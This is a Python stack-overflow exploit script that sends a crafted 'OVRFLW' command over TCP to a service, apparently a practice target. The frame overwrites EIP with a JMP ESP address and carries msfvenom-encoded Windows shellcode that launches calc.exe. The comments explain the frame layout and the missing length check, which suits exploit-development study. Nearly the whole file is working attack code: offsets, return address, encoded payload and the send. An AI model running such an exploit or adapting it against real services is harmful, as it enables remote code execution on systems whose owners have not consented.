#!/usr/bin/env python3
import socket
import struct
from PARAMETERS import RHOST, RPORT, buf_totlen, offset_eip, offset_esp, badchar_sequence, ptr_jmp_esp, sub_esp_10
# Stack-overflow harness for a service that accepts an "OVRFLW <arg>"
# command.  Every target-specific value (host, port, the two offsets, the
# return address and the stack-adjust stub) is imported from PARAMETERS,
# so the frame built below is only meaningful for the binary those values
# were measured against.  The script sends one message and exits: nothing
# is read back, the return value of send() is not checked, and the socket
# is never closed.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))  # plain TCP, no TLS, no timeout set
# msfvenom -p windows/exec -b '\x00\x04\x05\xA2\xA3\xAC\xAD\xC0\xC1\xEF\xF0' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=thread
# Encoded payload exactly as emitted by the command above; the -b list is
# the set of byte values the target is known to mangle, so the encoder has
# already removed them.  Treat the bytes as opaque: any edit, re-encoding or
# change of bad-char list invalidates them.
shellcode_calc = b""
shellcode_calc += b"\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b"
shellcode_calc += b"\x81\x73\x13\x08\x83\xd2\x07\x83\xeb\xfc"
shellcode_calc += b"\xe2\xf4\xf4\x6b\x50\x07\x08\x83\xb2\x8e"
shellcode_calc += b"\xed\xb2\x12\x63\x83\xd3\xe2\x8c\x5a\x8f"
shellcode_calc += b"\x59\x55\x1c\x08\xa0\x2f\x07\x34\x98\x21"
shellcode_calc += b"\x39\x7c\x7e\x3b\x69\xff\xd0\x2b\x28\x42"
shellcode_calc += b"\x1d\x0a\x09\x44\x30\xf5\x5a\xd4\x59\x55"
shellcode_calc += b"\x18\x08\x98\x3b\x83\xcf\xc3\x7f\xeb\xcb"
shellcode_calc += b"\xd3\xd6\x59\x08\x8b\x27\x09\x50\x59\x4e"
shellcode_calc += b"\x10\x60\xe8\x4e\x83\xb7\x59\x06\xde\xb2"
shellcode_calc += b"\x2d\xab\xc9\x4c\xdf\x06\xcf\xbb\x32\x72"
shellcode_calc += b"\xfe\x80\xaf\xff\x33\xfe\xf6\x72\xec\xdb"
shellcode_calc += b"\x59\x5f\x2c\x82\x01\x61\x83\x8f\x99\x8c"
shellcode_calc += b"\x50\x9f\xd3\xd4\x83\x87\x59\x06\xd8\x0a"
shellcode_calc += b"\x96\x23\x2c\xd8\x89\x66\x51\xd9\x83\xf8"
shellcode_calc += b"\xe8\xdc\x8d\x5d\x83\x91\x39\x8a\x55\xe9"
shellcode_calc += b"\xd3\x8a\x8d\x31\xd2\x07\x08\xd3\xba\x36"
shellcode_calc += b"\x83\xec\x55\xf8\xdd\x38\x32\x1a\x22\x89"
shellcode_calc += b"\xba\xa1\x9d\x3e\x4f\xf8\xdd\xbf\xd4\x7b"
shellcode_calc += b"\x02\x03\x29\xe7\x7d\x86\x69\x40\x1b\xf1"
shellcode_calc += b"\xbd\x6d\x08\xd0\x2d\xd2\x6b\xe2\xbe\x64"
shellcode_calc += b"\x26\xe6\xaa\x62\x08\x83\xd2\x07"
# Frame layout, in send order.  Each line depends on len(buf) as assembled
# so far, so the statement order below must not change.
buf = b""
buf += b"A"*(offset_eip - len(buf)) # padding up to the saved return address; buf is empty here, so exactly offset_eip bytes
buf += struct.pack("<I", ptr_jmp_esp) # EIP overwrite with "JMP ESP": a fixed 32-bit little-endian address, so it presumably relies on that module loading at a stable base
buf += b"\x90"*(offset_esp - offset_eip - 4) # Padding between EIP and ESP; the 4 is the address packed on the previous line
buf += sub_esp_10 # ESP overwrite (we move it to avoid any overwrite - nopsled alternative)
buf += shellcode_calc # The SHELLCODE
buf += b"D"*(buf_totlen - len(buf)) # Trailing Padding out to the fixed total length buf_totlen
buf += b"\n"
# The wire message is "OVRFLW " + buf_totlen bytes + "\n\n" (buf already
# ends in a newline, so the terminator is doubled).  From the service side
# the distinguishing feature is a single OVRFLW argument of fixed,
# oversized length; bounding that argument before it is copied is the
# defensive fix this script demonstrates the absence of.
s.send(b"OVRFLW " + buf + b"\n")